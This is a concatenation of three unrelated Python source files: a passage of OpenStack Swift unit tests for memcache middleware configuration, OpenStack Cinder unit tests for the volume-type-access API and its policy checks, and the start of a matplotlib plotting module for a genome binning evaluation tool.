        """Create the middleware under test with an empty inline conf."""
        self.app = memcache.MemcacheMiddleware(FakeApp(), {})

    def test_cache_middleware(self):
        """The middleware installs a MemcacheRing under 'swift.cache'."""
        req = Request.blank('/something', environ={'REQUEST_METHOD': 'GET'})
        resp = self.app(req.environ, start_response)
        self.assertTrue('swift.cache' in resp)
        self.assertTrue(isinstance(resp['swift.cache'], MemcacheRing))

    def test_conf_default_read(self):
        """An incomplete inline conf triggers a read of memcache.conf."""
        with mock.patch.object(memcache, 'ConfigParser', ExcConfigParser):
            # Every dict below omits at least one option, so the
            # middleware must fall back to /etc/swift/memcache.conf and
            # hit the raising parser.
            for d in ({},
                      {'memcache_servers': '6.7.8.9:10'},
                      {'memcache_serialization_support': '0'},
                      {'memcache_max_connections': '30'},
                      {'memcache_servers': '6.7.8.9:10',
                       'memcache_serialization_support': '0'},
                      {'memcache_servers': '6.7.8.9:10',
                       'memcache_max_connections': '30'},
                      {'memcache_serialization_support': '0',
                       'memcache_max_connections': '30'}
                      ):
                with self.assertRaises(Exception) as catcher:
                    memcache.MemcacheMiddleware(FakeApp(), d)
                self.assertEqual(
                    str(catcher.exception),
                    "read called with '/etc/swift/memcache.conf'")

    def test_conf_set_no_read(self):
        """A fully specified inline conf never reads memcache.conf."""
        with mock.patch.object(memcache, 'ConfigParser', ExcConfigParser):
            exc = None
            try:
                memcache.MemcacheMiddleware(
                    FakeApp(), {'memcache_servers': '1.2.3.4:5',
                                'memcache_serialization_support': '2',
                                'memcache_max_connections': '30'})
            except Exception as err:
                exc = err
        self.assertIsNone(exc)

    def test_conf_default(self):
        """With no configuration at all, built-in defaults apply."""
        with mock.patch.object(memcache, 'ConfigParser', EmptyConfigParser):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '127.0.0.1:11211')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, False)
        self.assertEqual(
            app.memcache._client_cache['127.0.0.1:11211'].max_size, 2)

    def test_conf_inline(self):
        """Inline conf values take precedence over the extra conf file."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0',
                 'memcache_max_connections': '5'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 5)

    def test_conf_inline_ratelimiting(self):
        """Error-suppression conf maps onto MemcacheRing error limits."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'error_suppression_limit': '5',
                 'error_suppression_interval': '2.5'})
        self.assertEqual(app.memcache._error_limit_count, 5)
        self.assertEqual(app.memcache._error_limit_time, 2.5)
        self.assertEqual(app.memcache._error_limit_duration, 2.5)

    def test_conf_inline_tls(self):
        """TLS conf creates an ssl context and loads the cert chain."""
        fake_context = mock.Mock()
        with mock.patch.object(ssl, 'create_default_context',
                               return_value=fake_context):
            with mock.patch.object(memcache, 'ConfigParser',
                                   get_config_parser()):
                memcache.MemcacheMiddleware(
                    FakeApp(),
                    {'tls_enabled': 'true',
                     'tls_cafile': 'cafile',
                     'tls_certfile': 'certfile',
                     'tls_keyfile': 'keyfile'})
            ssl.create_default_context.assert_called_with(cafile='cafile')
            fake_context.load_cert_chain.assert_called_with('certfile',
                                                            'keyfile')

    def test_conf_extra_no_section(self):
        """A missing section in the extra conf leaves the defaults intact."""
        with mock.patch.object(memcache, 'ConfigParser',
                               get_config_parser(section='foobar')):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '127.0.0.1:11211')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, False)
        self.assertEqual(
            app.memcache._client_cache['127.0.0.1:11211'].max_size, 2)

    def test_conf_extra_no_option(self):
        """Missing options in the extra conf leave the defaults intact."""
        replacement_parser = get_config_parser(
            memcache_servers='error', memcache_serialization_support='error',
            memcache_max_connections='error')
        with mock.patch.object(memcache, 'ConfigParser', replacement_parser):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '127.0.0.1:11211')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, False)
        self.assertEqual(
            app.memcache._client_cache['127.0.0.1:11211'].max_size, 2)

    def test_conf_inline_other_max_conn(self):
        """Inline 'max_connections' works as an alias for the option."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0',
                 'max_connections': '5'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 5)

    def test_conf_inline_bad_max_conn(self):
        """An unparsable inline max_connections falls back to the extra
        conf's value (4)."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0',
                 'max_connections': 'bad42'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 4)

    def test_conf_from_extra_conf(self):
        """All values can come from the extra conf file alone."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '1.2.3.4:5')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['1.2.3.4:5'].max_size, 4)

    def test_conf_from_extra_conf_bad_max_conn(self):
        """An unparsable extra-conf max_connections falls back to the
        default of 2."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser(
                memcache_max_connections='bad42')):
            app = memcache.MemcacheMiddleware(FakeApp(), {})
        self.assertEqual(app.memcache_servers, '1.2.3.4:5')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['1.2.3.4:5'].max_size, 2)

    def test_conf_from_inline_and_maxc_from_extra_conf(self):
        """max_connections falls through to the extra conf when not
        given inline."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_serialization_support': '0'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, True)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 4)

    def test_conf_from_inline_and_sers_from_extra_conf(self):
        """Serialization support falls through to the extra conf when
        not given inline."""
        with mock.patch.object(memcache, 'ConfigParser', get_config_parser()):
            app = memcache.MemcacheMiddleware(
                FakeApp(),
                {'memcache_servers': '6.7.8.9:10',
                 'memcache_max_connections': '42'})
        self.assertEqual(app.memcache_servers, '6.7.8.9:10')
        self.assertEqual(app.memcache._allow_pickle, False)
        self.assertEqual(app.memcache._allow_unpickle, True)
        self.assertEqual(
            app.memcache._client_cache['6.7.8.9:10'].max_size, 42)

    def test_filter_factory(self):
        """filter_factory passes conf and default kwargs to the middleware."""
        factory = memcache.filter_factory({'max_connections': '3'},
                                          memcache_servers='10.10.10.10:10',
                                          memcache_serialization_support='1')
        thefilter = factory('myapp')
        self.assertEqual(thefilter.app, 'myapp')
        self.assertEqual(thefilter.memcache_servers, '10.10.10.10:10')
        self.assertEqual(thefilter.memcache._allow_pickle, False)
        self.assertEqual(thefilter.memcache._allow_unpickle, True)
        self.assertEqual(
            thefilter.memcache._client_cache['10.10.10.10:10'].max_size, 3)

    @patch_policies
    def _loadapp(self, proxy_config_path):
        """
        Load a proxy from an app.conf to get the memcache_ring

        :returns: the memcache_ring of the memcache middleware filter
        """
        with mock.patch('swift.proxy.server.Ring'):
            app = loadapp(proxy_config_path)
        memcache_ring = None
        while True:
            # Walk down the WSGI middleware stack until the filter that
            # carries the memcache attribute is found.
            memcache_ring = getattr(app, 'memcache', None)
            if memcache_ring:
                break
            app = app.app
        return memcache_ring

    @with_tempdir
    def test_real_config(self, tempdir):
        """Loading a minimal real paste config yields documented defaults."""
        config = """
        [pipeline:main]
        pipeline = cache proxy-server

        [app:proxy-server]
        use = egg:swift#proxy

        [filter:cache]
        use = egg:swift#memcache
        """
        config_path = os.path.join(tempdir, 'test.conf')
        with open(config_path, 'w') as f:
            f.write(dedent(config))
        memcache_ring = self._loadapp(config_path)
        # only one server by default
        self.assertEqual(list(memcache_ring._client_cache.keys()),
                         ['127.0.0.1:11211'])
        # extra options
        self.assertEqual(memcache_ring._connect_timeout, 0.3)
        self.assertEqual(memcache_ring._pool_timeout, 1.0)
        # tries is limited to server count
        self.assertEqual(memcache_ring._tries, 1)
        self.assertEqual(memcache_ring._io_timeout, 2.0)

    @with_tempdir
    def test_real_config_with_options(self, tempdir):
        """Options set in the proxy config override the defaults; the
        rest keep their default values."""
        conf_text = """
        [pipeline:main]
        pipeline = cache proxy-server

        [app:proxy-server]
        use = egg:swift#proxy

        [filter:cache]
        use = egg:swift#memcache
        memcache_servers = 10.0.0.1:11211,10.0.0.2:11211,10.0.0.3:11211,
            10.0.0.4:11211
        connect_timeout = 1.0
        pool_timeout = 0.5
        tries = 4
        io_timeout = 1.0
        tls_enabled = true
        """
        conf_path = os.path.join(tempdir, 'test.conf')
        with open(conf_path, 'w') as f:
            f.write(dedent(conf_text))
        ring = self._loadapp(conf_path)
        expected_servers = ['10.0.0.%d:11211' % i for i in range(1, 5)]
        self.assertEqual(sorted(ring._client_cache.keys()), expected_servers)
        # explicitly configured options
        self.assertEqual(ring._connect_timeout, 1.0)
        self.assertEqual(ring._pool_timeout, 0.5)
        # tries is limited to server count
        self.assertEqual(ring._tries, 4)
        self.assertEqual(ring._io_timeout, 1.0)
        # error limiting options keep their defaults
        self.assertEqual(ring._error_limit_count, 10)
        self.assertEqual(ring._error_limit_time, 60)
        self.assertEqual(ring._error_limit_duration, 60)
        # tls_enabled wires an SSLContext into each client pool
        self.assertIsInstance(
            list(ring._client_cache.values())[0]._tls_context,
            ssl.SSLContext)

    @with_tempdir
    def test_real_memcache_config(self, tempdir):
        """Values from a separate memcache.conf act as defaults and are
        overridden by the proxy config where both are set."""
        proxy_conf_text = """
        [DEFAULT]
        swift_dir = %s

        [pipeline:main]
        pipeline = cache proxy-server

        [app:proxy-server]
        use = egg:swift#proxy

        [filter:cache]
        use = egg:swift#memcache
        connect_timeout = 1.0
        """ % tempdir
        proxy_conf_path = os.path.join(tempdir, 'test.conf')
        with open(proxy_conf_path, 'w') as f:
            f.write(dedent(proxy_conf_text))

        memcache_conf_text = """
        [memcache]
        memcache_servers = 10.0.0.1:11211,10.0.0.2:11211,10.0.0.3:11211,
            10.0.0.4:11211
        connect_timeout = 0.5
        io_timeout = 1.0
        error_suppression_limit = 0
        error_suppression_interval = 1.5
        """
        memcache_conf_path = os.path.join(tempdir, 'memcache.conf')
        with open(memcache_conf_path, 'w') as f:
            f.write(dedent(memcache_conf_text))

        ring = self._loadapp(proxy_conf_path)
        self.assertEqual(sorted(ring._client_cache.keys()),
                         ['10.0.0.%d:11211' % i for i in range(1, 5)])
        # proxy option takes precedence
        self.assertEqual(ring._connect_timeout, 1.0)
        # default tries are not limited by servers
        self.assertEqual(ring._tries, 3)
        # memcache conf options are defaults
        self.assertEqual(ring._io_timeout, 1.0)
        self.assertEqual(ring._error_limit_count, 0)
        self.assertEqual(ring._error_limit_time, 1.5)
        self.assertEqual(ring._error_limit_duration, 1.5)


# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()

#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import datetime

import webob

from cinder.api.contrib import volume_type_access as type_access
from cinder.api.v2 import types as types_api_v2
from cinder import context
from cinder import db
from cinder import exception
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake


def generate_type(type_id, is_public):
    """Build a fake volume-type record for the stubbed db layer.

    :param type_id: id to embed in the record
    :param is_public: truthy value; coerced to bool for 'is_public'
    :returns: dict shaped like a db volume-type row
    """
    return dict(
        id=type_id,
        name=u'test',
        deleted=False,
        created_at=datetime.datetime(2012, 1, 1, 1, 1, 1, 1),
        updated_at=None,
        deleted_at=None,
        is_public=bool(is_public),
    )

# Canned volume types keyed by id: types 1 and 2 are public,
# types 3 and 4 are private.
VOLUME_TYPES = {
    fake.VOLUME_TYPE_ID: generate_type(fake.VOLUME_TYPE_ID, True),
    fake.VOLUME_TYPE2_ID: generate_type(fake.VOLUME_TYPE2_ID, True),
    fake.VOLUME_TYPE3_ID: generate_type(fake.VOLUME_TYPE3_ID, False),
    fake.VOLUME_TYPE4_ID: generate_type(fake.VOLUME_TYPE4_ID, False)}

PROJ1_UUID = fake.PROJECT_ID
PROJ2_UUID = fake.PROJECT2_ID
PROJ3_UUID = fake.PROJECT3_ID

# Access grants: private type 3 is shared with projects 2 and 3,
# private type 4 only with project 3.
ACCESS_LIST = [{'volume_type_id': fake.VOLUME_TYPE3_ID,
                'project_id': PROJ2_UUID},
               {'volume_type_id': fake.VOLUME_TYPE3_ID,
                'project_id': PROJ3_UUID},
               {'volume_type_id': fake.VOLUME_TYPE4_ID,
                'project_id': PROJ3_UUID}]


def fake_volume_type_get(context, id, inactive=False, expected_fields=None):
    """Stub for db.volume_type_get backed by the VOLUME_TYPES fixture.

    When 'projects' is requested via expected_fields, attach the list of
    project ids granted access to the type by ACCESS_LIST.
    """
    vol = VOLUME_TYPES[id]
    if expected_fields and 'projects' in expected_fields:
        projects = []
        for access in ACCESS_LIST:
            if access['volume_type_id'] == id:
                projects.append(access['project_id'])
        vol['projects'] = projects
    return vol


def _has_type_access(type_id, project_id):
    """Return True if ACCESS_LIST grants project_id access to type_id."""
    return any(grant['volume_type_id'] == type_id and
               grant['project_id'] == project_id
               for grant in ACCESS_LIST)


def fake_volume_type_get_all(context, inactive=False, filters=None,
                             marker=None, limit=None, sort_keys=None,
                             sort_dirs=None, offset=None, list_result=False):
    """Stub for db.volume_type_get_all honouring the is_public filter.

    With no filter (or is_public=None) every type is returned.  With
    is_public set, a type matches either because its visibility equals
    the filter or, for is_public=True, because the caller's project has
    an explicit access grant.
    """
    if filters is None or filters['is_public'] is None:
        matches = VOLUME_TYPES
    else:
        matches = {}
        for type_id, vol_type in VOLUME_TYPES.items():
            if filters['is_public'] and _has_type_access(
                    type_id, context.project_id):
                matches[type_id] = vol_type
            elif vol_type['is_public'] == filters['is_public']:
                matches[type_id] = vol_type
    if list_result:
        return list(matches.values())
    return matches


class FakeResponse(object):
    """Minimal response stand-in carrying a pre-built types payload."""
    # One detail view ('volume_type') plus a two-item list view
    # ('volume_types') for the action controller to decorate.
    obj = {'volume_type': {'id': fake.VOLUME_TYPE_ID},
           'volume_types': [
               {'id': fake.VOLUME_TYPE_ID},
               {'id': fake.VOLUME_TYPE3_ID}]}

    def attach(self, **kwargs):
        # No-op stand-in; nothing needs attaching in these tests.
        pass


class FakeRequest(object):
    """Minimal request exposing only an admin context and a type cache."""
    environ = {"cinder.context": context.get_admin_context()}

    def cached_resource_by_id(self, resource_id, name=None):
        # Serve "cached" volume types straight from the fixture dict.
        return VOLUME_TYPES[resource_id]


class VolumeTypeAccessTest(test.TestCase):
    """Tests for the os-volume-type-access API extension.

    The db layer is stubbed with the module-level fixtures, so the tests
    exercise only controller logic and policy checks.
    """

    def setUp(self):
        super(VolumeTypeAccessTest, self).setUp()
        self.type_controller_v2 = types_api_v2.VolumeTypesController()
        self.type_access_controller = type_access.VolumeTypeAccessController()
        self.type_action_controller = type_access.VolumeTypeActionController()
        self.req = FakeRequest()
        self.context = self.req.environ['cinder.context']
        # Route all db volume-type lookups through the fixtures above.
        self.stubs.Set(db, 'volume_type_get',
                       fake_volume_type_get)
        self.stubs.Set(db, 'volume_type_get_all',
                       fake_volume_type_get_all)

    def assertVolumeTypeListEqual(self, expected, observed):
        """Assert both lists contain the same type ids, in any order."""
        self.assertEqual(len(expected), len(observed))
        expected = sorted(expected, key=lambda item: item['id'])
        observed = sorted(observed, key=lambda item: item['id'])
        for d1, d2 in zip(expected, observed):
            self.assertEqual(d1['id'], d2['id'])

    def test_list_type_access_public(self):
        """Querying os-volume-type-access on public type should return 404."""
        req = fakes.HTTPRequest.blank('/v2/%s/types/os-volume-type-access' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.type_access_controller.index,
                          req, fake.VOLUME_TYPE2_ID)

    def test_list_type_access_private(self):
        """Access list of a private type contains its project grants."""
        expected = {'volume_type_access': [
            {'volume_type_id': fake.VOLUME_TYPE3_ID,
             'project_id': PROJ2_UUID},
            {'volume_type_id': fake.VOLUME_TYPE3_ID,
             'project_id': PROJ3_UUID}]}
        result = self.type_access_controller.index(self.req,
                                                   fake.VOLUME_TYPE3_ID)
        self.assertEqual(expected, result)

    def test_list_with_no_context(self):
        """index propagates PolicyNotAuthorized when authorize fails."""
        req = fakes.HTTPRequest.blank('/v2/flavors/%s/flavors' %
                                      fake.PROJECT_ID)

        def fake_authorize(context, target=None, action=None):
            raise exception.PolicyNotAuthorized(action='index')
        self.stubs.Set(type_access, 'authorize', fake_authorize)

        self.assertRaises(exception.PolicyNotAuthorized,
                          self.type_access_controller.index,
                          req, fake.PROJECT_ID)

    # The tests below cover type listing for admin vs non-admin contexts
    # combined with the is_public query filter (true/false/none/absent).

    def test_list_type_with_admin_default_proj1(self):
        # Project 1 has no grants: only the public types are visible.
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types' % fake.PROJECT_ID,
                                      use_admin_context=True)
        req.environ['cinder.context'].project_id = PROJ1_UUID
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_default_proj2(self):
        # Project 2 is granted access to private type 3 as well.
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID},
                                     {'id': fake.VOLUME_TYPE3_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types' % PROJ2_UUID,
                                      use_admin_context=True)
        req.environ['cinder.context'].project_id = PROJ2_UUID
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_true(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=true' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_false(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE3_ID},
                                     {'id': fake.VOLUME_TYPE4_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=false' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_false_proj2(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE3_ID},
                                     {'id': fake.VOLUME_TYPE4_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=false' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        req.environ['cinder.context'].project_id = PROJ2_UUID
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_admin_ispublic_none(self):
        # is_public=none disables the filter: all four types are listed.
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID},
                                     {'id': fake.VOLUME_TYPE3_ID},
                                     {'id': fake.VOLUME_TYPE4_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=none' %
                                      fake.PROJECT_ID,
                                      use_admin_context=True)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_default(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types' % fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_ispublic_true(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=true' %
                                      fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_ispublic_false(self):
        # Non-admins only ever see the public types.
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=false' %
                                      fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_list_type_with_no_admin_ispublic_none(self):
        expected = {'volume_types': [{'id': fake.VOLUME_TYPE_ID},
                                     {'id': fake.VOLUME_TYPE2_ID}]}
        req = fakes.HTTPRequest.blank('/v2/%s/types?is_public=none' %
                                      fake.PROJECT_ID,
                                      use_admin_context=False)
        result = self.type_controller_v2.index(req)
        self.assertVolumeTypeListEqual(expected['volume_types'],
                                       result['volume_types'])

    def test_show(self):
        """show() decorates a single type with its is_public flag."""
        resp = FakeResponse()
        self.type_action_controller.show(self.req, resp, fake.VOLUME_TYPE_ID)
        self.assertEqual({'id': fake.VOLUME_TYPE_ID,
                          'os-volume-type-access:is_public': True},
                         resp.obj['volume_type'])

    def test_detail(self):
        """detail() decorates every listed type with its is_public flag."""
        resp = FakeResponse()
        self.type_action_controller.detail(self.req, resp)
        self.assertEqual(
            [{'id': fake.VOLUME_TYPE_ID,
              'os-volume-type-access:is_public': True},
             {'id': fake.VOLUME_TYPE3_ID,
              'os-volume-type-access:is_public': False}],
            resp.obj['volume_types'])

    def test_create(self):
        resp = FakeResponse()
        self.type_action_controller.create(self.req, {}, resp)
        self.assertEqual({'id': fake.VOLUME_TYPE_ID,
                          'os-volume-type-access:is_public': True},
                         resp.obj['volume_type'])

    def test_add_project_access(self):
        """addProjectAccess passes the type id argument through to the db."""
        def stub_add_volume_type_access(context, type_id, project_id):
            # The stub verifies the controller forwards its explicit
            # type-id argument (TYPE4), not the id embedded in the URL.
            self.assertEqual(fake.VOLUME_TYPE4_ID, type_id, "type_id")
            self.assertEqual(PROJ2_UUID, project_id, "project_id")
        self.stubs.Set(db, 'volume_type_access_add',
                       stub_add_volume_type_access)
        body = {'addProjectAccess': {'project': PROJ2_UUID}}
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID),
            use_admin_context=True)
        result = self.type_action_controller._addProjectAccess(
            req, fake.VOLUME_TYPE4_ID, body)
        self.assertEqual(202, result.status_code)

    def test_add_project_access_with_no_admin_user(self):
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID),
            use_admin_context=False)
        body = {'addProjectAccess': {'project': PROJ2_UUID}}
        self.assertRaises(exception.PolicyNotAuthorized,
                          self.type_action_controller._addProjectAccess,
                          req, fake.VOLUME_TYPE3_ID, body)

    def test_add_project_access_with_already_added_access(self):
        # A duplicate grant surfaces as HTTP 409 Conflict.
        def stub_add_volume_type_access(context, type_id, project_id):
            raise exception.VolumeTypeAccessExists(volume_type_id=type_id,
                                                   project_id=project_id)
        self.stubs.Set(db, 'volume_type_access_add',
                       stub_add_volume_type_access)
        body = {'addProjectAccess': {'project': PROJ2_UUID}}
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID), use_admin_context=True)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.type_action_controller._addProjectAccess,
                          req, fake.VOLUME_TYPE3_ID, body)

    def test_remove_project_access_with_bad_access(self):
        # Removing a non-existent grant surfaces as HTTP 404 Not Found.
        def stub_remove_volume_type_access(context, type_id, project_id):
            raise exception.VolumeTypeAccessNotFound(volume_type_id=type_id,
                                                     project_id=project_id)
        self.stubs.Set(db, 'volume_type_access_remove',
                       stub_remove_volume_type_access)
        body = {'removeProjectAccess': {'project': PROJ2_UUID}}
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID), use_admin_context=True)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.type_action_controller._removeProjectAccess,
                          req, fake.VOLUME_TYPE4_ID, body)

    def test_remove_project_access_with_no_admin_user(self):
        req = fakes.HTTPRequest.blank('/v2/%s/types/%s/action' % (
            fake.PROJECT_ID, fake.VOLUME_TYPE3_ID), use_admin_context=False)
        body = {'removeProjectAccess': {'project': PROJ2_UUID}}
        self.assertRaises(exception.PolicyNotAuthorized,
                          self.type_action_controller._removeProjectAccess,
                          req, fake.VOLUME_TYPE3_ID, body)

# Copyright 2020 Department of Computational Biology for Infection Research - Helmholtz Centre for Infection Research
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

from src.utils import labels as utils_labels
from src.utils import load_ncbi_taxinfo
from src import binning_classes
import matplotlib
matplotlib.use('Agg')
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import matplotlib.ticker as ticker
import numpy as np
import os, sys, inspect
import pandas as pd
from collections import OrderedDict
# Make the package's parent directory importable when this module is
# executed as a script rather than imported as part of the package.
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)


def create_colors_list():
    """Return a palette of 30 colors: the first nine tab10 colors,
    black, then all of Set2 (8) and Set3 (12)."""
    palette = [tuple(c) for c in plt.cm.tab10(np.linspace(0, 1, 10))[:-1]]
    palette.append("black")
    palette.extend(tuple(c) for c in plt.cm.Set2(np.linspace(0, 1, 8)))
    palette.extend(tuple(c) for c in plt.cm.Set3(np.linspace(0, 1, 12)))
    return palette


def create_legend(color_indices, available_tools, output_dir):
    """Save a standalone legend (one colored marker per tool) to
    <output_dir>/genome/legend.pdf."""
    palette = create_colors_list()
    if color_indices:
        palette = [palette[i] for i in color_indices]

    color_source = iter(palette)
    handles = []
    for _ in available_tools:
        handles.append(Line2D([], [], markeredgewidth=0.0, linestyle="None",
                              marker="o", markersize=10,
                              markerfacecolor=next(color_source)))

    fig = plt.figure(figsize=(0.5, 0.5))
    fig.legend(handles, available_tools, loc='center', frameon=False,
               ncol=5, handletextpad=0.1)
    fig.savefig(os.path.join(output_dir, 'genome', 'legend.pdf'),
                dpi=100, format='pdf', bbox_inches='tight')
    plt.close(fig)


def plot_precision_vs_bin_size(pd_bins, output_dir):
    """Scatter purity per bin against log bin size, one figure per tool,
    saved to <output_dir>/genome/<tool>/purity_vs_bin_size.png."""
    # The gold standard itself is not plotted.
    pd_plot = pd_bins[pd_bins[utils_labels.TOOL] != utils_labels.GS]

    for tool_label, pd_tool in pd_plot.groupby(utils_labels.TOOL):
        fig, axs = plt.subplots(figsize=(5, 4.5))
        log_sizes = np.log(pd_tool['total_length'])
        axs.scatter(log_sizes, pd_tool['precision_bp'], marker='o')

        axs.set_xlim([None, np.log(pd_tool['total_length'].max())])
        axs.set_ylim([0.0, 1.0])
        axs.set_title(tool_label, fontsize=12)

        plt.ylabel('Purity per bin (%)', fontsize=12)
        plt.xlabel('Bin size [log(# bp)]', fontsize=12)

        fig.savefig(os.path.join(output_dir, 'genome', tool_label, 'purity_vs_bin_size.png'), dpi=200, format='png', bbox_inches='tight')
        plt.close(fig)


